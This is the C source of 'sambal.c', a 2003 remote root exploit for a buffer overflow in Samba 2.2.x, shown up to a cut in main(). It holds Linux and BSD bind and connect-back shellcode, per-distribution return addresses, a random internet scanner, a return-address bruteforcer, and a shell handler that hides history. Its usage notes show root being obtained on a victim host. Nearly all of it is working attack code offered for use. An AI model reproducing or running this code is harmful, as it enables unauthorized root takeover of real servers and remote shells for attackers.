   ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _

      - -------\______||--._____\---._______//-|__    //-.___|----._____||

      / \   /

                                                   \/

[*] samba-2.2.8 < remote root exploit                 by eSDee (www.netric.org|be)

    ------------------------------------------------------------------------------

    sambal.c is a remote root exploit for samba 2.2.x and prior that works against 

    Linux (all distros), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x 

    and 3.2-non exec stack). It has a scan option, so you can easily identify your 

    lost samba boxes on your home WAN...

    It began with the creation of the great buffer.

    Four bytes were written to it to mark the beginning of it.

    Seven bytes were written to store all information.

    And nine, nine bytes were written to the end to assure a long enough buffer.

    For within this buffer, it could harbor all required user input.

    But they were all deceived, for another byte was written.

    Inside the Memory, in the heart of the stack. The user input was long enough

    to write a master byte. To control the entire buffer, and into this byte, the user

    poured his cruelty, his malice and his will to dominate it all!

    One byte to rule them all.... 

    Copyright (c) 2003 Netric Security

    All rights reserved.

    THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED

    WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF

    MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.

[*] The bug

    in /source/smbd/trans2.c on line 250 - function: call_trans2open() :

    namelen = strlen(pname)+1;

    StrnCpy(fname,pname,namelen); 

[*] MyFirstStachelNET(tm) - howto - 

    sambal.c is able to identify samba boxes. It will send a netbios

    name packet to port 137. If the box responds with the mac address

    00-00-00-00-00-00, it's probally running samba.

    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0

    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

    --------------------------------------------------------------

    + Scan mode.

    + [192.168.0.3] Samba

    + [192.168.0.10] Windows

    + [192.168.0.20] Windows

    + [192.168.0.21] Samba

    + [192.168.0.30] Windows

    + [192.168.0.31] Samba

    + [192.168.0.33] Windows

    + [192.168.0.35] Windows

    + [192.168.0.36] Windows

    + [192.168.0.37] Windows

    ...

    + [192.168.0.133] Samba

    Great!

    You could now try a preset (-t0 for a list), but most of the 

    time bruteforce will do. The smbd spawns a new process on every 

    connect, so we can bruteforce the return address...

    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133

    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

    --------------------------------------------------------------

    + Verbose mode.

    + Bruteforce mode. (Linux)

    + Using ret: [0xbffffed4]

    + Using ret: [0xbffffda8]

    + Using ret: [0xbffffc7c]

    + Using ret: [0xbffffb50]

    + Using ret: [0xbffffa24]

    + Using ret: [0xbffff8f8]

    + Using ret: [0xbffff7cc]

    + Worked!

    --------------------------------------------------------------

    *** JE MOET JE MUIL HOUWE

    Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux

    uid=0(root) gid=0(root) groups=99(nobody)

[*] Credits

    lynx, mike, sacrine, the_itch, tozz (for adding targets) 

    no1 (i ripped some parts from a subnet scanner) 

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <netdb.h>

#include <errno.h>

#include <fcntl.h>

#include <signal.h>

#include <string.h>

#include <unistd.h>

#include <sys/select.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <sys/time.h>

#include <sys/wait.h>

#include <netinet/in.h>

#include <arpa/inet.h>

typedef struct {

unsigned char type;

unsigned char flags;

unsigned short length;

} NETBIOS_HEADER;

typedef struct {

unsigned char protocol[4];

unsigned char command;

unsigned short status;

unsigned char reserved;

unsigned char  flags;

unsigned short flags2;

unsigned char  pad[12];

unsigned short tid;

unsigned short pid;

unsigned short uid;

unsigned short mid;

} SMB_HEADER;

int OWNED = 0;

pid_t childs[100];

struct sockaddr_in addr1;

struct sockaddr_in addr2;

char

linux_bindcode[] =

        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"

        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"

        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"

        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"

        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"

        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"

        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"

        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"

        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"

        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"

        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"

        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"

        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char

bsd_bindcode[] =

"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"

"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"

"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"

"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"

"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"

"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"

"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"

"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"

"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"

"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"

"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"

"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"

"\xeb\x9a";

char

linux_connect_back[] =

"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"

"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"

"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"

"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"

"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"

"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"

"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"

"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"

"\x01\xcd\x80"; 

char

bsd_connect_back[] =

        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"

        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"

        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"

        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"

        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"

        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"

        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"

        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

struct {

        char *type;

        unsigned long ret;

char *shellcode;

int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {

{ "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode, 0 },

{ "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,    0 },

{ "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode, 0 },

{ "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode, 0 },

        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,    0 },

        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 0 },

{ "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 0 },

{ "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 0 },

{ "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode, 0 },

{ "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,    0 },

{ "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,   0 }, 

{ "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,    0 },

{ "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     1 },

{ "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode, 1 },

{ "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode, 1 },

{ "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,      1 },

{ "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode, 2 },

{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,      2 },

{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,      2 },

{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,      2 },

        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode, 0 },

};

void shell();

void usage();

void handler();

int is_samba(char *ip, unsigned long time_out);

int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);

int read_timer(int fd, unsigned int time_out);

int write_timer(int fd, unsigned int time_out);

int start_session(int sock);

int exploit_normal(int sock, unsigned long ret, char *shellcode);

int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 

usage(char *prog)

{

        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"

        "-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"

"-B <step>       bruteforce steps (default = 300)\n"

"-c <ip address> connectback ip address\n"

"-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"

"-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\n"

"-f              force\n" 

        "-p <port>       port to attack (default = 139)\n"

"-r <ret>        return address\n"

"-s              scan mode (random)\n"

"-S <network>    scan mode\n"

"-t <type>       presets (0 for a list)\n" 

"-v              verbose mode\n\n", prog);

        exit(1);

}

int

is_samba(char *ip, unsigned long time_out)

{

char

nbtname[]= /* netbios name packet */

{

        0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,

        0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

        0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,

        0x00,0x01

};

        unsigned char recv_buf[1024];

unsigned char *ptr;

int i = 0;

int s = 0;

unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

if(Connect(s, ip, 137, time_out) == -1) {

close(s);

return -1;

} 

memset(recv_buf, 0x00, sizeof(recv_buf));

if(write_timer(s, time_out) == 1) {

if (write(s, nbtname, sizeof(nbtname)) <= 0) {

  close(s);

return -1;

}

}

if (read_timer(s, time_out) == 1) {

if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {

close(s);

return -1;

}

        ptr = recv_buf + 57;

  total = *(ptr - 1); /* max names */

        while(ptr < recv_buf + sizeof(recv_buf)) {

              ptr += 18;

if (i == total) {

ptr -= 19;

if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&

              *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {

close(s);

return 0;

}

close(s);

return 1;

}

i++;

}

}

close(s);

return -1;

}

int 

Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   connect_read, connect_write;

struct timeval           timeout;

int                      getsockopt_length = 0;

int                      getsockopt_error = 0;

struct sockaddr_in       server;

bzero(&server, sizeof(server));

server.sin_family = AF_INET;

inet_pton(AF_INET, ip, &server.sin_addr);

server.sin_port = htons(port);

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {

close(fd);

    return -1;

  }

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

    return -1;

  }

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&connect_read);

FD_ZERO(&connect_write);

FD_SET(fd, &connect_read);

FD_SET(fd, &connect_write);

if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {

if(errno != EINPROGRESS) {

      close(fd);

      return -1;

    }

  }

else {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

      return -1;

    }

return 1;

}

select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

if(select_status == 0) {

close(fd);

return -1;

}

if(select_status == -1) {

close(fd);

return -1;

}

if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {

if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {

getsockopt_length = sizeof(getsockopt_error);

if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {

errno = ETIMEDOUT;

close(fd);

return -1;

}

if(getsockopt_error == 0) {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

       } 

else {

errno = getsockopt_error;

close(fd);

return (-1);

}

}

}

else {

close(fd);

return 1;

}

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

}

int 

read_timer(int fd, unsigned int time_out)

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   fdread;

struct timeval           timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {

close(fd);

return (-1);

}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

return (-1);

}

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&fdread);

FD_SET(fd, &fdread);

select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

if(select_status == 0) {

close(fd);

return (-1);

}

if(select_status == -1) {

close(fd);

return (-1);

}

if(FD_ISSET(fd, &fdread)) {

  if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

      return -1;

    }

return 1;

} 

else {

close(fd);

return 1;

}

}

int

write_timer(int fd, unsigned int time_out)

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   fdwrite;

struct timeval           timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    

close(fd);

return (-1);

}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

return (-1);

  }

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&fdwrite);

FD_SET(fd, &fdwrite);

select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

if(select_status == 0) {

close(fd);

return -1;

}

if(select_status == -1) {

close(fd);

return -1;

}

if(FD_ISSET(fd, &fdwrite)) {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

}

else { 

close(fd);

return -1;

}

}

void 

shell(int sock)

{

        fd_set  fd_read;

        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";

        int n;

        FD_ZERO(&fd_read);

        FD_SET(sock, &fd_read);

        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {

                FD_SET(sock,&fd_read);

                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){

                                fprintf(stderr, "EOF\n");

                                exit(2);

                        }

                        if (write(1, buff, n) < 0) break;

                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){

                                fprintf(stderr, "EOF\n");

                                exit(2);

                        }

                        if (send(sock, buff, n, 0) < 0) break;

                }

                usleep(10);

        }

        fprintf(stderr, "Connection lost.\n\n");

        exit(0);

}

void

handler()

{

int sock = 0;

int i = 0;

OWNED = 1;

        for (i = 0; i < 100; i++)

                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

                close(sock);

exit(1);

        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {

                fprintf(stdout, "+ Worked!\n"

                                "--------------------------------------------------------------\n");

                shell(sock);

                close(sock);

        }

}

int 

start_session(int sock)

{

char buffer[1000];

char response[4096];

char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

        char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"

                 "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type = 0x00;         /* session message */

        netbiosheader->flags = 0x00;

        netbiosheader->length = htons(0x2E);

        smbheader->protocol[0] = 0xFF;

        smbheader->protocol[1] = 'S';

        smbheader->protocol[2] = 'M';

        smbheader->protocol[3] = 'B';

        smbheader->command = 0x73;         /* session setup */

        smbheader->flags = 0x08;         /* caseless pathnames */

        smbheader->flags2 = 0x01;         /* long filenames supported */

        smbheader->pid = getpid() & 0xFFFF;

smbheader->uid          = 100;

        smbheader->mid = 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

if(write_timer(sock, 3) == 1)

if (send(sock, buffer, 50, 0) < 0) return -1;

memset(response, 0x00, sizeof(response));

if (read_timer(sock, 3) == 1)

if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;

        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */

        netbiosheader->flags    = 0x00;

        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;

        smbheader->protocol[1]  = 'S';

        smbheader->protocol[2]  = 'M';

        smbheader->protocol[3]  = 'B';

        smbheader->command      = 0x70;         /* start connection */

smbheader->pid          = getpid() & 0xFFFF;

smbheader->tid = 0x00;

        smbheader->uid          = 100;

memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)

                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)

                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;

        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;

}

int

exploit_normal(int sock, unsigned long ret, char *shellcode)

{

char buffer[4000];

        char exploit_data[] =

                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x90";

int i = 0;

unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */

        netbiosheader->flags            = 0x04;

        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;

        smbheader->protocol[1]          = 'S';

        smbheader->protocol[2]          = 'M';

        smbheader->protocol[3]          = 'B';

        smbheader->command              = 0x32;         /* SMBtrans2 */

smbheader->tid = 0x01;

        smbheader->uid                  = 100;

memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

buffer[1096] = 0xEB;

buffer[1097] = 0x70;

for (i = 0; i < 4 * 24; i += 8) {

memcpy(buffer + 1099 + i, &dummy, 4);

memcpy(buffer + 1103 + i, &ret,   4);

}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 

exploit_data, sizeof(exploit_data) - 1);

memcpy(buffer + 1800, shellcode, strlen(shellcode));

if(write_timer(sock, 3) == 1) {

if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;

return 0;

}

return -1;

}

int

exploit_openbsd32(int sock, unsigned long ret, char *shellcode)

{

        char buffer[4000];

        char exploit_data[] =

                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x90";

        int i = 0;

        unsigned long dummy = ret - 0x30;

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */

        netbiosheader->flags            = 0x04;

        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;

        smbheader->protocol[1]          = 'S';

        smbheader->protocol[2]          = 'M';

        smbheader->protocol[3]          = 'B';

        smbheader->command              = 0x32;         /* SMBtrans2 */

        smbheader->tid                  = 0x01;

        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

for (i = 0; i < 4 * 24; i += 4)

memcpy(buffer + 1131 + i, &dummy, 4);

        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),

                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {

                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;

                return 0;

        }

        return -1;

}

int

main (int argc,char *argv[])

{

char *shellcode = NULL;

char scan_ip[256];

int brute = -1;

int connectback = 0;

int force = 0;

int i = 0;

int ip1 = 0;

int ip2 = 0;

int ip3 = 0;

int ip4 = 0;

int opt = 0;

int port = 139;

int random = 0;

int scan = 0;

int sock = 0;

int sock2 = 0;

int status = 0;

int type = 0;

int verbose = 0;

unsigned long BRUTE_DELAY = 100000;

unsigned long ret = 0x0;

unsigned long MAX_CHILDS = 40;

unsigned long STEPS = 300;

        struct hostent *he;

fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"

"--------------------------------------------------------------\n");

        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {

                switch(opt) 

{

case 'b':

brute = atoi(optarg);

if ((brute < 0) || (brute > 3)) {

fprintf(stderr, "Invalid platform.\n\n");

return -1;

}

break;

case 'B':

STEPS = atoi(optarg);

if (STEPS == 0) STEPS++;

break;

case 'c':

sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);

connectback = 1;

if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {

fprintf(stderr, "Invalid IP address.\n\n");

return -1;

}

linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;

linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;

linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;

linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;

break;

case 'C':

MAX_CHILDS = atoi(optarg);

if (MAX_CHILDS == 0) {

fprintf(stderr, "Invalid number of childs.\n");

return -1;

}

if (MAX_CHILDS > 99) {

fprintf(stderr, "Too many childs, using 99. \n");

MAX_CHILDS = 99;

}

break;

case 'd':

BRUTE_DELAY = atoi(optarg);

break;

case 'f':

force = 1;

break;

                        case 'p':

                                port = atoi(optarg);

                                if ((port <= 0) || (port > 65535)) {

                                        fprintf(stderr, "Invalid port.\n\n");

                                        return -1;

                                }

                                break;

case 'r':

ret = strtoul(optarg, &optarg, 16);

break;

case 's':

random = 1;

scan = 1;

break;

case 'S':

random = 0;

scan = 1;

sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);

ip3--;

break;

                        case 't':

                                type = atoi(optarg);

                                if (type == 0 || type > sizeof(targets) / 16) {

                                        for(i = 0; i < sizeof(targets) / 16; i++)

                                                fprintf(stdout, "%02d. %s           [0x%08x]\n", i + 1,

                                                                targets[i].type, (unsigned int) targets[i].ret);

                                        fprintf(stderr, "\n");

                                        return -1;

                                }

                                break;

case 'v':

verbose = 1;

break;

                        default:

                                usage(argv[0] == NULL ? "sambal" : argv[0]);

                                break;

                }

        }

if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) 

usage(argv[0] == NULL ? "sambal" : argv[0]);

if (scan == 1) 

fprintf(stdout, "+ Scan mode.\n");

if (verbose == 1)

fprintf(stdout, "+ Verbose mode.\n");

if (scan == 1) {

srand(getpid());

while (1) {

if (random == 1) {

ip1 = rand() % 255;

ip2 = rand() % 255;

ip3 = rand() % 255; } 

else {

ip3++;

if (ip3 > 254) { ip3 = 1; ip2++; }

if (ip2 > 254) { ip2 = 1; ip1++; }

if (ip1 > 254) exit(0);

}

for (ip4 = 0; ip4 < 255; ip4++) {

i++;

snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);

usleep(BRUTE_DELAY);

switch (fork()) {

case 0:

switch(is_samba(scan_ip, 2)) {

case 0:

fprintf(stdout, "+ [%s] Samba\n", scan_ip);

break;

case 1:

fprintf(stdout, "+ [%s] Windows\n", scan_ip);

break;

default:

break;

}

exit(0);

break;

case -1:

fprintf(stderr, "+ fork() error\n");

exit(-1);

break;

default:

if (i > MAX_CHILDS - 2) { 

wait(&status); 

i--;

}

break;

}

}

}

return 0;

}

he = gethostbyname(argv[optind]);

        if (he == NULL) {

fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);

return -1;

}

if (brute == -1) {

if (ret == 0) ret = targets[type - 1].ret;

shellcode = targets[type - 1].shellcode;

if (connectback == 1) {

fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", 

ip1, ip2, ip3, ip4);

switch(targets[type - 1].os_type) {

case 0: /* linux */

shellcode = linux_connect_back;

break;

case 1: /* FreeBSD/NetBSD */

shellcode = bsd_connect_back;

break;

case 2: /* OpenBSD */

shellcode = bsd_connect_back;

break;

case 3: /* OpenBSD 3.2 Non-exec stack */

shellcode = bsd_connect_back;

break;

}

}

if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

fprintf(stderr, "+ socket() error.\n");

return -1;

}

        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

               fprintf(stderr, "+ socket() error.\n");

                return -1;

       }

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

        addr1.sin_family = AF_INET;

